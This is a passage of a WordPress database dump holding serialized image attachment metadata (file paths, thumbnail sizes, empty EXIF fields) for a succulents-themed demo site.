00;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1459,394,'_wp_attachment_image_alt','a'),(1460,1013,'_wp_attachment_image_alt','a'),(1461,2446,'_wp_attachment_image_alt','o'),(1462,1807,'_wp_attached_file','2018/02/portfolio-img-5.jpg'),(1463,1807,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:27:\"2018/02/portfolio-img-5.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"portfolio-img-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"portfolio-img-5-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"portfolio-img-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"portfolio-img-5-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"portfolio-img-5-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"portfolio-img-5-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"portfolio-img-5-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"portfolio-img-5-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"portfolio-img-5-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"portfolio-img-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"portfolio-img-5-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1464,395,'_wp_attached_file','2018/01/h2-img-7.jpg'),(1465,395,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:359;s:6:\"height\";i:447;s:4:\"file\";s:20:\"2018/01/h2-img-7.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h2-img-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h2-img-7-241x300.jpg\";s:5:\"width\";i:241;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h2-img-7-359x300.jpg\";s:5:\"width\";i:359;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h2-img-7-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h2-img-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1466,2447,'_wp_attached_file','2018/01/author-img-2.png'),(1467,2447,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:80;s:6:\"height\";i:80;s:4:\"file\";s:24:\"2018/01/author-img-2.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1468,2447,'_wp_attachment_image_alt','o'),(1469,1016,'_wp_attached_file','2018/01/blog-img-15.jpg'),(1470,1016,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:733;s:4:\"file\";s:23:\"2018/01/blog-img-15.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"blog-img-15-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-15-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"blog-img-15-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"blog-img-15-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"blog-img-15-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"blog-img-15-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:23:\"blog-img-15-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:23:\"blog-img-15-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:23:\"blog-img-15-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:24:\"blog-img-15-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:23:\"blog-img-15-550x733.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:733;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"blog-img-15-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"blog-img-15-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-15-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1471,2448,'_wp_attached_file','2018/01/author-img-3.png'),(1472,2448,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:80;s:6:\"height\";i:80;s:4:\"file\";s:24:\"2018/01/author-img-3.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1473,2448,'_wp_attachment_image_alt','o'),(1474,395,'_wp_attachment_image_alt','a'),(1475,2460,'_wp_attached_file','2018/02/slide4.jpg'),(1476,2460,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:799;s:6:\"height\";i:581;s:4:\"file\";s:18:\"2018/02/slide4.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"slide4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"slide4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"slide4-600x436.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:436;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"slide4-300x218.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"slide4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"slide4-768x558.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:558;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:18:\"slide4-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:18:\"slide4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:18:\"slide4-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:18:\"slide4-799x550.jpg\";s:5:\"width\";i:799;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:18:\"slide4-550x581.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:581;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:18:\"slide4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"slide4-600x436.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:436;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"slide4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1477,396,'_wp_attached_file','2018/01/h2-img-8.jpg'),(1478,396,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:299;s:6:\"height\";i:447;s:4:\"file\";s:20:\"2018/01/h2-img-8.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h2-img-8-299x300.jpg\";s:5:\"width\";i:299;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h2-img-8-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h2-img-8-299x300.jpg\";s:5:\"width\";i:299;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h2-img-8-299x240.jpg\";s:5:\"width\";i:299;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h2-img-8-299x300.jpg\";s:5:\"width\";i:299;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1479,396,'_wp_attachment_image_alt','a'),(1480,397,'_wp_attached_file','2018/01/h2-img-9.jpg'),(1481,397,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:382;s:6:\"height\";i:447;s:4:\"file\";s:20:\"2018/01/h2-img-9.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h2-img-9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h2-img-9-256x300.jpg\";s:5:\"width\";i:256;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h2-img-9-382x300.jpg\";s:5:\"width\";i:382;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h2-img-9-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h2-img-9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1482,1807,'_wp_attachment_image_alt','a'),(1483,397,'_wp_attachment_image_alt','a'),(1484,1808,'_wp_attached_file','2018/02/portfolio-img-6.jpg'),(1485,1808,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:27:\"2018/02/portfolio-img-6.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"portfolio-img-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"portfolio-img-6-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"portfolio-img-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"portfolio-img-6-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"portfolio-img-6-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"portfolio-img-6-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"portfolio-img-6-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"portfolio-img-6-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"portfolio-img-6-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"portfolio-img-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"portfolio-img-6-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1486,1016,'_wp_attachment_image_alt','a'),(1487,2460,'_wp_attachment_image_alt','o'),(1488,398,'_wp_attached_file','2018/01/h2-img-10.jpg'),(1489,398,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:671;s:6:\"height\";i:447;s:4:\"file\";s:21:\"2018/01/h2-img-10.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h2-img-10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h2-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"h2-img-10-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h2-img-10-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h2-img-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"h2-img-10-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h2-img-10-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"h2-img-10-550x447.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:447;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"h2-img-10-550x447.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:447;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h2-img-10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"h2-img-10-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h2-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1490,1020,'_wp_attached_file','2018/01/blog-img-16.jpg'),(1491,1020,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:733;s:4:\"file\";s:23:\"2018/01/blog-img-16.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"blog-img-16-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-16-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"blog-img-16-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"blog-img-16-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jp